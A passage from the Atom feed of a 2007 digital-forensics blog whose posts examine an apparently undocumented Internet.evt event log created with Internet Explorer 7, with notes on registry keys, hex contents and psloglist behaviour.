src='https://blogger.googleusercontent.com/tracker/5808631531257292980-1903388692540715613?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/1903388692540715613/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=1903388692540715613' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1903388692540715613'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1903388692540715613'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/05/defeating-whole-disk-encryption-part-1.html' title='&quot;Defeating&quot; Whole Disk Encryption - Part 1'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-7047902629048775903</id><published>2007-05-15T23:42:00.000Z</published><updated>2008-12-11T18:57:00.680Z</updated><title type='text'>IE7 Internet.evt continued</title><content type='html'>Andreas Schuster has some &lt;a href="http://computer.forensikblog.de/en/2007/05/weird_ie7_event_log.html"&gt;follow-up&lt;/a&gt; regarding the internet.evt file.  Andreas points out that with XP SP2 (German Locale) the file is "Windows .evt"  Take a minute to check out his blog.&lt;br /&gt;&lt;br /&gt;Further testing on my system reveals that this file has remained its default size 65,536 and clearing the log file seems to have no effect - same file size, same lack of content.&lt;br /&gt;&lt;br /&gt;Has anyone seen anything different?&lt;br /&gt;&lt;br /&gt;And just to clarify: &lt;br /&gt;&lt;br /&gt;In my last post, I wrote that "Using psloglist against the file appears to dump the contents of the file."  However, further testing shows that the file is not readable - when Windows cannot find the event file specified, it opens AppEvent.evt.  &lt;br /&gt;&lt;br /&gt;To illustrate, here is a screenshot of psloglist being run against "cybermonkey."  Since there is no cybermonkey.evt on my computer, I get the data from AppEvent.evt.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_npXrWSJ111w/RkpJwXIJ33I/AAAAAAAAAAk/WvYgLjb7kdo/s1600-h/cybermonkey.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_npXrWSJ111w/RkpJwXIJ33I/AAAAAAAAAAk/WvYgLjb7kdo/s400/cybermonkey.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5064941826122309490" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-7047902629048775903?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/7047902629048775903/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=7047902629048775903' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7047902629048775903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7047902629048775903'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/05/ie7-internetevt-continued.html' title='IE7 Internet.evt continued'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_npXrWSJ111w/RkpJwXIJ33I/AAAAAAAAAAk/WvYgLjb7kdo/s72-c/cybermonkey.gif' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-4088480019982474258</id><published>2007-05-06T16:52:00.000Z</published><updated>2008-12-11T18:57:02.648Z</updated><title type='text'></title><content type='html'>First off, &lt;a href="http://windowsir.blogspot.com/"&gt;Harlan Carvey&lt;/a&gt; mentions that his &lt;a href="http://www.amazon.com/Windows-Forensic-Analysis-DVD-Toolkit/dp/159749156X/ref=pd_bbs_sr_1/102-4960157-5177769?ie=UTF8&amp;s=books&amp;amp;qid=1178471448&amp;sr=8-1"&gt;new book&lt;/a&gt; has information about this on page 205; I still haven't made it out to buy the book yet, but the day isn't over.  Harlan also mentions that the file is created when IE7 is installed.&lt;br /&gt;&lt;br /&gt;Wow, there's been quite a response to the first post. . . A couple of things that Andreas Schuster requested.  This is the contents of the HKLM\System\CurrentControlSet\Services\EventLog\Internet  Explorer&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_npXrWSJ111w/Rj4KeHIJ30I/AAAAAAAAAAM/pgzTBNWFVb8/s1600-h/registry.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_npXrWSJ111w/Rj4KeHIJ30I/AAAAAAAAAAM/pgzTBNWFVb8/s400/registry.jpg" alt="" id="BLOGGER_PHOTO_ID_5061494543636619074" border="0" /&gt;&lt;/a&gt;and this is the HKLM\System\CurrentControlSet\Services\EventLog\Internet  Explorer:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_npXrWSJ111w/Rj4Nw3IJ31I/AAAAAAAAAAU/avTqXGtSpQY/s1600-h/registry1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://1.bp.blogspot.com/_npXrWSJ111w/Rj4Nw3IJ31I/AAAAAAAAAAU/avTqXGtSpQY/s400/registry1.jpg" alt="" id="BLOGGER_PHOTO_ID_5061498164294049618" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is Internet.evt opened in a hex editor:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_npXrWSJ111w/Rj4OYnIJ32I/AAAAAAAAAAc/nvNQ2wkgBwo/s1600-h/internet.evt.hex.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_npXrWSJ111w/Rj4OYnIJ32I/AAAAAAAAAAc/nvNQ2wkgBwo/s400/internet.evt.hex.gif" alt="" id="BLOGGER_PHOTO_ID_5061498847193849698" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;the remainder of the file appears to be empty.  Using psloglist against the file appears to dump the contents of the file.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-4088480019982474258?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/4088480019982474258/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=4088480019982474258' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4088480019982474258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4088480019982474258'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/05/first-off-harlan-carvey-mentions-that.html' title=''/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_npXrWSJ111w/Rj4KeHIJ30I/AAAAAAAAAAM/pgzTBNWFVb8/s72-c/registry.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-4987395096615278783</id><published>2007-05-04T16:50:00.000Z</published><updated>2007-05-04T18:10:54.218Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='internet.evt'/><category scheme='http://www.blogger.com/atom/ns#' term='intrusions'/><title type='text'>Internet.evt</title><content type='html'>While coding an event log dumper for Windows systems.  I stumbled upon a something that was, I thought, of interest to forensic examiners.  I found a new (and apparently undocumented) event log - %windir%\system32\config\Internet.evt.&lt;br /&gt;&lt;br /&gt;According to &lt;a href="http://www.fspro.net/forum/viewtopic.php?p=570&amp;sid=7ac002a19954dc619843df3f98a09a0e"&gt;this post&lt;/a&gt;, and &lt;a href="http://www.bold-fortune.com/forums/index.php?act=Print&amp;amp;amp;amp;amp;amp;client=printer&amp;f=13&amp;amp;t=237"&gt;this one as well&lt;/a&gt;, the file shows up when Internet Explorer 7 is installed.  This coorelates with the computers that I have available (that is computers with IE7 have the file, and those with IE6 do not), though I have not yet tested this to determine that this is in fact the case.&lt;br /&gt;&lt;br /&gt;I haven't spent a lot of time looking at the structure of .evt files generally, but in my experience, they are generally readable with a hexeditor, but this is not so with the internet.evt.  The windows event viewer, when opened shows this file as Internet Explorer, but it appears empty.  When I turned the log viewer I was coding towards the file, however; it had some interesting artifacts.&lt;br /&gt;&lt;br /&gt;Most notably, software installations were logged.  Including (I think) software installations that were performed using Firefox.  This could be very relevant when investigating intrusions where a web browser is used to download and install tools, but obviously some more testing needs to be done.&lt;br /&gt;&lt;br /&gt;I'll post what I find in a follow-up, but to summarize:&lt;br /&gt;&lt;br /&gt;I know Internet.evt:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;exists on XP with IE7 installed.&lt;/li&gt;&lt;li&gt;does not appear to exist with pervious versions of IE.&lt;/li&gt;&lt;li&gt;resides in the %windir%\system32\config&lt;/li&gt;&lt;li&gt;is not visable to the windows event viewer in XP home (tested on 1 box).&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;I suspect the file:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;is created when IE7 is installed.&lt;/li&gt;&lt;li&gt; has a file structure that differs from standard event logs.&lt;/li&gt;&lt;li&gt;also logs internet related software installations from other browsers.&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;To do:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;test suspicions&lt;/li&gt;&lt;li&gt;figure out what types of data are stored in the file.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;determine what registry entries (if any) are associated with the file.&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;If anyone knows anything more about this, I'd be interested in hearing from you.  I couldn't find any reference on &lt;a href="http://technet.microsoft.com/en-us/default.aspx"&gt;Microsoft's Technet&lt;/a&gt; but, we all know the schitzophrenic nature of Technet, so there might be some reference somewhere. . .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-4987395096615278783?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/4987395096615278783/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=4987395096615278783' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4987395096615278783'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/4987395096615278783'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/05/internetevt.html' title='Internet.evt'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>7</thr:total></entry></feed>
